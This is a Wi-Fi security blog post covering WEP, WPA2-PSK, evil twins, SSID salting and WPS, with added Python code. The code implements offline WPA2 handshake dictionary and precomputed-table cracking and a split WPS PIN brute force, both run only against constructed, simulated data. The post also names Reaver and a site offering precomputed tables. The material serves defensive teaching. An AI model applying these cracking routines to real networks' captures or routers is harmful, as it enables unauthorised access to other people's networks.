Protect Your Wi-Fi Network With This Simple Technique

Dr. Joseph Ikhalia
4 min read · Nov 19, 2018


WEP, WPA and WPA2 in a Nutshell

Wired Equivalent Privacy (WEP) was the original 802.11 security protocol, created to give a wireless local area network (WLAN) a level of security and privacy comparable to what is expected of a wired LAN. Wi-Fi Protected Access (WPA) was the Wi-Fi Alliance's interim replacement: it provides stronger encryption (TKIP) and better user authentication than WEP while still running on WEP-era hardware. Wi-Fi Protected Access 2 (WPA2) is the full IEEE 802.11i standard and the Wi-Fi Alliance's certification program for it, and uses AES-CCMP to secure wireless networks.

WEP has a tremendous number of security flaws. If you still run WEP, an attacker who records enough traffic can recover the key in minutes, with no password guessing at all. The three core deficiencies of WEP are:

· Static encryption keys: one RC4 key shared by every device and never rotated, with no per-session keys.

· No real integrity protection: the CRC-32 checksum is linear, so an attacker can flip bits in a frame and fix up the checksum without knowing the key.

· Ineffective use of initialization vectors (IVs): the IV is only 24 bits and is sent in the clear, so IVs repeat under the same key on a busy network, and statistical attacks on the RC4 keystream recover the key in minutes.

In WPA and WPA2 Personal (pre-shared key mode), the 4-way handshake can be captured passively, or forced by deauthenticating a client, and then attacked offline: the attacker derives a key from each candidate passphrase and checks it against the handshake with no further contact with the network. For this reason the pre-shared key, the Wi-Fi password, needs to be long and complex; it is only entered once per device, so the standard's maximum of 63 characters costs nothing in daily use. A long, random passphrase is the main mitigation against dictionary and brute-force password guessing.

An attacker can set up an evil twin: a rogue access point broadcasting the same SSID (network name) as the real Wi-Fi network you use. Devices that remember the network will happily connect to the twin when its signal is stronger, and once they do, the attacker sits in the middle of all their traffic. This is the classic man-in-the-middle (MITM) position: anything not encrypted above the Wi-Fi layer can be read, modified or injected. Evil twins are hard to mitigate because a plain SSID proves nothing about who is behind it. The robust fix is to authenticate the access point, not just the client, with WPA2-Enterprise (802.1X/EAP) and a certificate-based method such as EAP-TLS, or PEAP/EAP-TTLS with clients configured to validate the RADIUS server's certificate. With mutual authentication the client checks the network's identity before it sends any credential, so it cannot be fooled into joining a twin. Two caveats: a twin of a PSK-protected network also needs the pre-shared key to complete the 4-way handshake (an open twin mostly catches devices that have saved open hotspot networks), and enterprise authentication only helps if the client actually verifies the certificate; a client that accepts any server certificate hands its credentials to a twin running its own RADIUS server.

The evil twin attack is very common because, for an attacker, it is easier than cracking your Wi-Fi password. On any network you do not control, a VPN (or at least end-to-end TLS for everything) is strongly recommended.
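As an added illustration (not part of the original post), here is what "authenticating the access point" looks like in a wpa_supplicant.conf for a PEAP network: first the weak setting, then the hardened one. The SSID, identity, password, CA path and RADIUS server name are placeholders.

```conf
# Weak: no ca_cert and no server-name check. The client accepts any RADIUS
# certificate, so an evil twin running its own RADIUS server completes PEAP
# and collects the MSCHAPv2 challenge/response for offline cracking.
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jdoe"
    password="placeholder-password"
    phase2="auth=MSCHAPV2"
}

# Hardened: pin the issuing CA and the RADIUS server's name, so the client
# authenticates the network before it sends any credential. A twin cannot
# present a certificate that passes both checks, and the client refuses.
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jdoe"
    password="placeholder-password"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    domain_suffix_match="radius.corp.example"
    phase2="auth=MSCHAPV2"
}
```

Use only one of the two blocks in a real file. EAP-TLS (eap=TLS with client_cert and private_key) removes the password altogether and is the stronger choice where client certificates can be deployed; the CA pinning and name check still apply there.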

There is also a weakness in how WPA and WPA2 Personal salt the passphrase: both derive the pairwise master key with PBKDF2 and use the SSID, the network name, as the salt. A salt is supposed to be a random value mixed into the key derivation so that identical passphrases produce different keys and an attacker cannot do the expensive work once and reuse it everywhere. Using the SSID achieves the first part (the same passphrase yields a different key on every differently named network), but an SSID is anything but random: thousands of routers ship with "linksys", "NETGEAR" or "dlink". Access points with common SSIDs are therefore far more exposed to precomputation, dictionary and password-guessing attacks.

Attackers can precompute the keys for common passwords against common SSIDs in advance, so that cracking a captured handshake becomes a fast lookup rather than a long computation; these precomputed PMK tables are usually called rainbow tables. They need not even be generated locally: ready-made sets covering the most common SSIDs can be downloaded from sites such as https://www.renderlab.net/projects/WPA-tables/ . Giving your network a unique SSID defeats every such table.
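To make the salt discussion and the offline handshake attack concrete, here is an added Python example (not from the original post) that implements the WPA2-PSK key derivation and the check an attacker runs against a captured 4-way handshake, then shows why a precomputed table built for "linksys" is useless against a network with a unique SSID. The MAC addresses, nonces, EAPOL bytes and word list are constructed for the example, not taken from a real capture.

```python
import hashlib
import hmac
from typing import Dict, Optional


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 32 bytes).
    The SSID is the only salt, so networks sharing an SSID share PMKs for the same passphrase."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i in 0..3, cut to 64 bytes."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4)]
    return b"".join(blocks)[:64]


def derive_kck(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of MACs and nonces); KCK = first 16 bytes."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes) -> bytes:
    """WPA2/CCMP: MIC = HMAC-SHA1(KCK, EAPOL frame with its MIC field zeroed), first 16 bytes."""
    return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]


# Constructed handshake parameters (not a real capture). Everything below is visible
# on the air to a passive listener; only the passphrase is secret.
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
# Stand-in for EAPOL message 2 with the MIC field already zeroed (constructed bytes).
EAPOL_MSG2 = bytes.fromhex("0103007502010a00") + bytes(8) + SNONCE + bytes(58)

# Constructed word list standing in for a dictionary file.
WORDLIST = ["letmein", "qwerty123", "password123", "iloveyou", "sunshine1"]


def make_capture(ssid: str, passphrase: str) -> Dict[str, bytes]:
    """Plays the legitimate client: produces the MIC a sniffer would see in message 2."""
    kck = derive_kck(derive_pmk(passphrase, ssid), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return {"ap": AP_MAC, "sta": STA_MAC, "anonce": ANONCE, "snonce": SNONCE,
            "eapol": EAPOL_MSG2, "mic": eapol_mic(kck, EAPOL_MSG2)}


def pmk_matches(pmk: bytes, cap: Dict[str, bytes]) -> bool:
    """Cheap per-candidate check: recompute the MIC from a candidate PMK and compare."""
    kck = derive_kck(pmk, cap["ap"], cap["sta"], cap["anonce"], cap["snonce"])
    return hmac.compare_digest(eapol_mic(kck, cap["eapol"]), cap["mic"])


def crack_handshake(ssid: str, cap: Dict[str, bytes], wordlist) -> Optional[str]:
    """Plain dictionary attack: 4096 PBKDF2 rounds per guess, which is the whole cost."""
    for word in wordlist:
        if pmk_matches(derive_pmk(word, ssid), cap):
            return word
    return None


def build_pmk_table(ssid: str, wordlist) -> Dict[bytes, str]:
    """Precompute PMKs for one SSID once; reusable against every network with that name."""
    return {derive_pmk(word, ssid): word for word in wordlist}


def crack_with_table(cap: Dict[str, bytes], table: Dict[bytes, str]) -> Optional[str]:
    """With the table in hand only the cheap PRF/HMAC step remains per guess."""
    for pmk, word in table.items():
        if pmk_matches(pmk, cap):
            return word
    return None


if __name__ == "__main__":
    cap = make_capture("linksys", "password123")
    print("dictionary attack:", crack_handshake("linksys", cap, WORDLIST))
    table = build_pmk_table("linksys", WORDLIST)
    print("precomputed table:", crack_with_table(cap, table))
    # Same weak passphrase, but a unique SSID: the 'linksys' table no longer applies.
    cap2 = make_capture("k7x-home-2291", "password123")
    print("table vs unique SSID:", crack_with_table(cap2, table))
```

The two defences in the text map directly onto the two functions: a long random passphrase makes the word list in crack_handshake hopeless, and a unique SSID makes build_pmk_table's output worthless against your network.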

Wi-Fi Protected Setup (WPS)

One way to join a WPS-enabled network is to enter a short PIN instead of the passphrase. The PIN is eight digits, usually printed on a sticker on the router, and many routers ship with WPS PIN enabled by default. The design flaw is that the PIN's last digit is a checksum and the router confirms the two halves of the PIN separately, so an attacker within radio range can recover it with at most about 11,000 attempts rather than 10 million, typically within a few hours; once the PIN is known the router hands over the WPA or WPA2 pre-shared key. A tool in Kali Linux called “Reaver” carries out exactly this attack, and its companion “wash” lists nearby access points that advertise WPS. Therefore, WPS must be turned off, and it is worth confirming with wash afterwards, because some routers keep advertising WPS even after the setting is “disabled”. This is one of the reasons to run custom firmware: some stock firmware does not allow users to turn WPS off at all.
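An added Python example (not from the original post) showing the arithmetic behind the WPS weakness: the checksum digit, and a split brute force against a simulated router that, like a real WPS enrollee, answers the two halves of the PIN separately. The SimulatedEnrollee class and the PIN 12345670 are constructed for illustration; nothing here talks to a radio.

```python
from typing import Optional, Tuple


def wps_checksum(first_seven: str) -> int:
    """WPS PIN checksum over the first seven digits: odd positions weighted 3, even positions 1."""
    accum = 0
    for index, digit in enumerate(first_seven):
        accum += 3 * int(digit) if index % 2 == 0 else int(digit)
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """A PIN the router will even consider: 8 digits with a correct checksum digit."""
    return len(pin) == 8 and pin.isdigit() and wps_checksum(pin[:7]) == int(pin[7])


class SimulatedEnrollee:
    """Constructed stand-in for a router's WPS side (not a real device). It mirrors the
    protocol's leak: the reply to message M4 confirms the first half of the PIN on its
    own, and the reply to M6 confirms the second half, so each half is attacked alone."""

    def __init__(self, pin: str) -> None:
        if not is_valid_pin(pin):
            raise ValueError("PIN must be 8 digits with a valid checksum")
        self._pin = pin
        self.sessions = 0  # one WPS exchange per guess, which is what rate limiting counts

    def m4(self, first_half: str) -> bool:
        self.sessions += 1
        return first_half == self._pin[:4]

    def m6(self, first_half: str, second_half: str) -> bool:
        self.sessions += 1
        return first_half == self._pin[:4] and second_half == self._pin[4:]


def brute_force_pin(ap: SimulatedEnrollee) -> Optional[Tuple[str, int]]:
    """Split brute force, the approach Reaver automates: at most 10,000 + 1,000 sessions.
    Returns the recovered PIN and the number of sessions it took."""
    first_half = None
    for guess in range(10_000):
        candidate = f"{guess:04d}"
        if ap.m4(candidate):
            first_half = candidate
            break
    if first_half is None:
        return None
    # Second half: only 3 free digits, the 4th must satisfy the checksum.
    for guess in range(1_000):
        three = f"{guess:03d}"
        second_half = three + str(wps_checksum(first_half + three))
        if ap.m6(first_half, second_half):
            return first_half + second_half, ap.sessions
    return None


def search_space() -> Tuple[int, int]:
    """Valid whole-PIN space versus the worst case for the split attack."""
    return 10 ** 7, 10 ** 4 + 10 ** 3


if __name__ == "__main__":
    router = SimulatedEnrollee("12345670")  # constructed default-looking PIN; checksum digit is 0
    print(brute_force_pin(router))          # ('12345670', 1803)
    print(search_space())                   # (10000000, 11000)
```

Real routers add delays and lockouts after failed attempts, which is why the attack takes hours rather than minutes, but a lockout only slows a 11,000-guess search; it does not rescue the design. Disabling WPS does.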
